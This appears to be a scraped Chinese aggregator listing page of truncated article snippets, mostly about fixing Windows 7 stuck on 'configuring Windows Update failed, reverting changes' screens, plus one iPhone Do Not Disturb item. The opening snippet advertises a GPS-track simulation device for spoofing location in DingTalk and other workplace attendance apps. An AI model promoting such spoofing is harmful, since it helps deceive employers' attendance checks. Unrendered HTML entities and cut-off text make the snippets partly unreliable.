    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57